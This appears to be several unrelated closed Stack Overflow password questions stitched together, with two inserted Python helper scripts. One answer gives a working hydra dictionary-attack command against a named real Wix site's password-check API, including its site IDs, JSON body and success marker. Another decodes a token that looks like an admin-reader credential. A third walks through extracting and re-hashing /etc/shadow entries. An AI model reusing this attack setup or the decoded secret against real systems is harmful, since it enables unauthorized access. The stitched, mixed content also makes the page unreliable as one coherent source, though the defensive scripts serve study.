Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
How can I validate whether or not a correct username and password has been entered? I would like to prompt a user if their entered username/password did not find a match in the Notes address book.
If you try a NotesView.update() with wrong credentials it will fail, the callback function will get false as first parameter and I assume that it will get a specific error as second parameter.
I don't think you can compare the password with passwords stored in the Domino address book. In Domino, the passwords are only saved as a salted hash, and there is no way you can create the same hash value on the iOS device.
Just get the username and password and compare it against the data you stored in your address book. If you are using some encryption the conception is a bit different, but you still have to perform a comparison.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 11 months ago.
I am trying to write a linux command to get into a Wix website I have created and put a password on. I have created the webpage to specifically show my students how easy it is for a hacker to crack a simple password, and hence the importance of strong passwords.
The website I have put the simple password on is https://missyjezabel.wixsite.com/my-site
I have written the following command to crack the password. Unfortunately, although it runs, it does not give the correct password.
hydra -l '' -P password.txt missyjezabel.wixsite.com http-post-form "/my-site:value=^PASS^:Please enter the correct password." -V
Any ideas of how to get it to work?
hydra -l '' -S -V -I -P password.txt site-pages.wix.com http-post-form "/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3:{\"password\"\:\"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\:\"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\:\"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}:S=\"success\"\:true:H=Origin\:https\://missyjezabel.wixsite.com:H=Accept\: */*:H=Content-Type\:application/json"
The site reaches out to an API endpoint that uses a different address to verify that the password matches with the given site-id:
site-pages.wix.com/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3
Target that site with correct JSON params:
{\"password\"\: \"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\: \"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\: \"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}
If the password is correct the response contains a "success":true json field.
S=\"success\"\:true
And some necessary headers to include in the requests:
H=Origin\: https\://missyjezabel.wixsite.com:H=Accept\: */*:H=Content-Type\: application/json
As this is a dictionary attack, password.txt must contain the valid password, otherwise it will fail. For the given scenario I would recommend a short, manually created list.
Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 1 year ago.
I want to know how to decrypt a text without knowing the key used or the algorithm such as this text:
RUE2RDRDMDE5OTpxci1hZG1pbi1yZWFkZXIxOjAwMDdDMUJBOEU4Q0IyOUQwNjg1RkJDRkMzMDdDMjc4:Nzg0MTk5MDUzMjA1OTEyXzk3MTUwODkzODk1MjpuY2hjNnkzenFkb2tvZXR0cWR2OTo2OEJFNkFCMTY4RjNGMTdFNUJFRjY3OTgwQjgwMDBTRVZBQURZRUVSVUFBTDBBTUtGdFM2QVNIQUwwRUE=
Does this text have any signs that could help me to know at least what algorithm is used? And then how to decrypt without knowing the key?
This is base64 encrypted; there is no key needed for this. But in general, you can test all possible encryption algorithms and look at all the results.
Decoded:
EA6D4C0199:qr-admin-reader1:0007C1BA8E8CB29D0685FBCFC307C278784199053205912_971508938952:nchc6y3zqdokoettqdv9:68BE6AB168F3F17E5BEF67980B8000SEVAADYEERUAAL0AMKFtS6ASHAL0EA
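An added example, not part of the answer above: one way to check whether a colon-separated token like the one in the question is merely base64-encoded rather than encrypted, by strictly decoding each segment and measuring how much of the result is printable. The sample token, the function names and the 0.95 threshold are assumptions constructed for this example.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable.encode())   # printable ASCII byte values

def classify_segment(seg: str, threshold: float = 0.95) -> dict:
    """Strictly base64-decode one segment and judge whether it is readable."""
    try:
        raw = base64.b64decode(seg, validate=True)
    except (binascii.Error, ValueError):
        # Characters outside the base64 alphabet or bad padding.
        return {"kind": "not-base64", "decoded": None}
    if not raw:
        return {"kind": "not-base64", "decoded": None}
    ratio = sum(b in PRINTABLE for b in raw) / len(raw)
    if ratio >= threshold:
        # Readable after decoding: this was an encoding, no key involved.
        return {"kind": "encoded-text", "decoded": raw.decode("ascii", "replace")}
    # Ciphertext, compressed data, or plain text that happens to use
    # only base64 alphabet characters; decoding alone cannot tell which.
    return {"kind": "opaque-bytes", "decoded": raw.hex()}

def inspect_token(token: str) -> list:
    """Classify every colon-separated segment of a token."""
    return [classify_segment(s) for s in token.split(":")]

# Constructed sample: readable text, 32 non-printable bytes, and junk.
SAMPLE = ":".join([
    base64.b64encode(b"device-42:reader-account:EXAMPLE").decode(),
    base64.b64encode(bytes(range(128, 160))).decode(),
    "not*base64",
])

if __name__ == "__main__":
    for result in inspect_token(SAMPLE):
        print(result)
```

A segment reported as encoded-text offers no confidentiality: anyone who sees the token can read it, so secrets carried this way should be treated as exposed.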
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 2 years ago.
So my question is straightforward: given a Linux username and a password, how can I test if it is a valid account?
You can validate that a given password is correct for a given username using the shadow file.
On most modern distributions, the hashed passwords are stored in the shadow file /etc/shadow (which is only readable by root). As root, pull the line from the shadow file for the given user like so:
grep '^username:' /etc/shadow
You will see something like this:
username:$1$TrOIigLp$PUHL00kS5UY3CMVaiC0/g0:15020:0:99999:7:::
After the username there is $1. This indicates that it is an MD5 hash. After that there is another $, then (in this case) TrOIigLp followed by another $. TrOIigLp is the salt. After that is the hashed password, which was hashed using the salt - in this case PUHL00kS5UY3CMVaiC0/g0.
Now, you can use openssl to hash the given password using the same salt, like so:
openssl passwd -1 -salt TrOIigLp
Enter the given password when prompted; the openssl command should compute the MD5 hash using the salt provided, and it should be exactly the same as the above from the shadow file. The -1 in the above command is for MD5 hashing.
If you are concerned about security (which you should be), the accepted answer represents a security risk by leaving the plaintext password in the ~/.bash_history file. With this in mind, it would be better to try logging in, or perhaps removing this entry from the ~/.bash_history.
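An added example (not from the answers above) that parses the shadow entry format the first answer walks through: it extracts the scheme id, salt and digest, and also handles locked and password-less entries, which can never match a supplied password. The alice and daemon lines, the needs_review flag and the function names are constructed for illustration.

```python
from dataclasses import dataclass
from typing import Optional

# crypt(3) scheme ids -> (name, still considered acceptable)
SCHEMES = {"1": ("MD5-crypt", False), "5": ("SHA-256-crypt", True),
           "6": ("SHA-512-crypt", True), "y": ("yescrypt", True)}

@dataclass
class ShadowEntry:
    user: str
    status: str = "password"      # or "locked", "no-login", "empty"
    scheme: Optional[str] = None
    salt: Optional[str] = None
    digest: Optional[str] = None
    needs_review: bool = False    # hypothetical audit flag, not a shadow field
    last_change_day: Optional[int] = None  # days since 1970-01-01

def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("expected 9 colon-separated fields")
    pw = fields[1]
    e = ShadowEntry(fields[0], last_change_day=int(fields[2]) if fields[2] else None)
    if pw == "":                       # empty field: no password required
        e.status, e.needs_review = "empty", True
        return e
    if pw.startswith("!"):             # passwd -l locks by prefixing "!"
        e.status, pw = "locked", pw.lstrip("!")
    if not pw.startswith("$"):
        if len(pw) == 13:              # traditional DES crypt: 2-char salt
            e.scheme, e.salt, e.digest, e.needs_review = "DES-crypt", pw[:2], pw[2:], True
        else:                          # "*", "!" or "!!": no usable hash
            e.status = "no-login"
        return e
    parts = pw.split("$")              # ['', id, (params,) salt, digest]
    if len(parts) < 4:
        raise ValueError("malformed $id$salt$hash field")
    name, ok = SCHEMES.get(parts[1], ("unknown:" + parts[1], False))
    e.scheme, e.salt, e.digest, e.needs_review = name, parts[-2], parts[-1], not ok
    return e

# First line is the entry quoted in the answer; the other two are constructed.
SAMPLE = """\
username:$1$TrOIigLp$PUHL00kS5UY3CMVaiC0/g0:15020:0:99999:7:::
alice:!$6$CONSTRUCTEDSALT$CONSTRUCTEDDIGEST:19500:0:99999:7:::
daemon:*:19000:0:99999:7:::
"""

def audit(text: str):
    return [parse_shadow_line(l) for l in text.splitlines() if l.strip()]
```

Run against the quoted entry, the parser reports MD5-crypt with needs_review set, which is the cue to have that account's password rehashed under a stronger scheme.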
Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 2 years ago.
I've come across a system that requires you to include a number in your username. I feel this is pointless, as the username should be easy to remember, and not be subject to requirements that may be applied to passwords.
However I can't find a good write up of the reasons for this. Can anyone reference a good source for this, and/or explain it in better words than I can?
Edit: I'm getting answers explaining why they do this, which are certainly of value, but there must be a write up somewhere of how to make a secure login system, that advocates a simple, easy to remember username.
Having no clue about the specific system mentioned, if one can call support and say something like "My username is John and I forgot my password" - adding a number may add just a bit of security.
Also, if the system is not protected against brute-force attacks, one can try common usernames together with common passwords.
I agree with Xavjer: the reason for this is most likely not security-related.
I agree with you: If the requirement is security-related - the security scheme is probably wrong.
Edit:
Another idea - Maybe they want to force you to use a username which is different than the one you use on other sites. Since many users tend to select the same username and password for different sites, and in case the password is compromised on one of these sites - this may help (but again, just a bit).
I would say it could be because if you force a number in a username, you will most likely never receive a duplicate name problem. There won't be someone having for example the name 'peter' and then there is a 'peter95' and a 'peter112'. No one will have the original one.
This is just what I think is the most reasonable answer.
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 13 years ago.
There are several ways to secure passwords with an automated encryption algorithm, but sometimes it's best to write it down on paper and keep the paper itself secured. Hackers can't easily get to paper. However, if someone finds that paper, they can see the passwords plainly.
What's a non-automated method of securing information on a piece of paper? For example, have the real password be in every other character (eg p1a2s3s4w5o6r7d8 = password).
Take a character sequence from a book you have lying beside your computer. You can take the sequence in any number of ways: First/second/etc. letter of each word in a chapter you decide, for example.
Have a look here for some history and ideas about steganography ;) Your example is a simple working one, you can even use an invisible ink or write it backwards with only every 5th character relevant etc., it is up to your imagination :)
What you're suggesting is a simple cipher. I'm not sure why you'd want to implement something like that vs. using a password manager like KeePass, but you can use a simple substitution cipher where A=Z, Z=A etc. if you need to write it down.